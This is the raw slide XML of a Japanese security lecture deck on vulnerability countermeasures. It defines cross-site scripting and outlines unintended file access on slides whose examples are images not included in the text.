          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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231993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D729450-6D59-1EAF-A676-DB612F6B27A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CDEA9ED-4A4E-B706-1C8F-7807A964B19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2603FC9-21D8-F073-DE77-8D289F20D9C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}"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1A897894-C98A-57E5-1996-27E8129AA4D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676D3A-24CA-F11F-2E78-E1155F59C0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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175183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D16FD-4939-06C6-1831-204F7016B1B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7C9C73-1E1A-5D5C-4408-69E4C0F8089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510A13-6A51-32F7-C5CA-1C64D5E0E754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}"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74D75E27-0907-90CD-CEE4-A2BC3D8A49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A5BA6D-A1FE-8E7A-EA26-B4ABD4C11059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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36374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86C1E5-0168-32DE-8679-C27136F6C38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DE5866C-4485-F2D3-2DF1-7FF59FAC03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895B457-4337-CAB8-7CE6-79D37D56BAE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}"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94EFC754-B6DB-A76B-D296-8F00686FD56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B94431-2431-E928-4D9F-B540ED3B01DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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1819670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2206AC-1B43-60F4-C557-7AF76E766BC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AD153D6-CE67-E3F3-62C4-7FE7F6B39D7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5D2D681-E7A3-2F64-F013-ECAAF024EE5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5C857FC-9DD5-CBAB-8401-C67DF5D45E51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="フッター プレースホルダー 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7078261-E740-9FB7-8289-DB6E6A8505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9E61D96-0B5B-5947-0236-FFB3AA231C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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36142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0ACAD0-F043-190F-5741-2845256AA8E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AF61080-348F-7532-8744-D6A24AE59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2D10199-449A-69A7-5EC2-9ACC2CC9C64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830A55D-7BCC-D6F8-4B28-7D6E5B5F1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507CF38-8680-7092-B9F5-8A081D63181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F87889-A91E-3DA2-6361-2C64298D4D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="フッター プレースホルダー 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18654F53-4F47-D15E-D32A-8E2FEA839E0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5DA0B61-387D-233C-77A1-DBEB98B66C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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3408867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42E94-8821-245F-F924-125B72E1638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E7CBFA4-2A2F-7B52-A7CE-48B4508E82DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="フッター プレースホルダー 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346510B1-36CD-5A38-CDFE-893306E8DA0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4197B1D-9975-4345-A6EA-01289B046E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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970781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3ED419-58FA-E25B-1667-4C14453398EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="フッター プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31CF32A7-DF04-C6AF-8776-3704A520060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C11C046-5D1B-A3DE-4BA5-5C2078F770D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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2061941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F93185-57E8-5911-D437-952A5513378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8287D77-8B4C-8BC2-E53E-7FAE1D1C3C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6782827-B6DE-C026-5B93-0B04D9707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B9D0C1D-FF8F-740F-97EA-2D5235CB8BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="フッター プレースホルダー 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5357BE4-1C5B-8179-5429-D5840CB7C7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84B4D5A-41F7-4DF1-F074-DA4FA794E322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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224058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7FE90A-122B-B7E6-4D18-4981BDB2AB0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B0609B8-8E98-460C-4635-533414B54F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67B17F0-8059-38E5-25F5-8A02560E7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0E9DB1A-AE17-C539-A1B8-1C1B524E0F33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="フッター プレースホルダー 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B401718-7D36-E984-C9DB-B36095DC224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F197570-A495-FCB1-6AD4-743A6949C518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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2126310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689FDE7-A923-28ED-40B2-64376550B7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2814EB9-527F-4830-FCFA-B2B8A01AB1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16EA81F-0FFD-D9D5-57F0-76CA6D0180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719A26-D519-4BC2-B2AB-268D25E03260}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="フッター プレースホルダー 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E50DE08-BFEC-9E17-7FB9-DA0323BCFE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FCE69E1-AD1D-9107-E757-0D23C5604E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DB466-7F30-4B6B-A7D7-0B5DD8FF6D15}" type="slidenum">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1642192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BBBFB3-2AF8-7512-F150-6CD59AFA5A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089329" y="1122363"/>
            <a:ext cx="9962984" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>脆弱性対策</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>～不正アクセスの手口と対策～</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="字幕 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AC23F8-5F81-F4EC-A04B-B4F1EB4F0A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>NTanaka1994</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421772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A5518-EFCC-F024-F726-B22BE8FEF3E5}"/>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B476C496-FFEC-820A-835F-CDB6C20D23AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>利用者が入力した内容を表示するような構成の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイトに存在する欠陥を悪用して、攻撃者が用意した悪意のあるスクリプトを利用者の元に送り込んで実行させる攻撃手法。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>略称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS(Cross Site Scripting)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02574D3C-7700-5C6C-8D0B-5D84560207EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220694" y="6311900"/>
            <a:ext cx="6971306" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：https://e-words.jp/w/クロスサイトスクリプティング.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21680877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651D35-5B89-BB6E-44C0-73DA95B50242}"/>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3C20CD3F-D13D-A994-7896-88C7AB1CA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(HTML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F91FE7-C039-F7AD-340D-A4019ECA80D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961837" y="2951413"/>
            <a:ext cx="6268325" cy="1352739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE889169-3A57-84B6-FCEA-C17D1B8708F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217379" y="4304152"/>
            <a:ext cx="1757239" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>irectory.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21439526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ED4CC0-D764-B56E-31F7-C4BDA696F006}"/>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A73315AC-D220-DB30-2A24-871A1A80D2D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>通常：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ファイル名を指定する</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6265A3C3-D022-CAA6-7135-A09273C2CE47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2858493"/>
            <a:ext cx="10420847" cy="2045212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6889389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D89D7F-9CD6-D843-5E39-BBF4BB0C75B9}"/>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C82493A0-7CAB-83D8-50C3-1566F3DD36F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>通常：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>公開ファイルにアクセスされる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52533902-FFF2-D3E1-4AEA-132601291328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2803039"/>
            <a:ext cx="10515600" cy="2058478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13697122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39E63E-7532-4417-D39A-D293AAF642D4}"/>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19FA7C8E-073B-24C6-5BEE-39ECDB066E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>作成者の意図しないファイルアクセス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
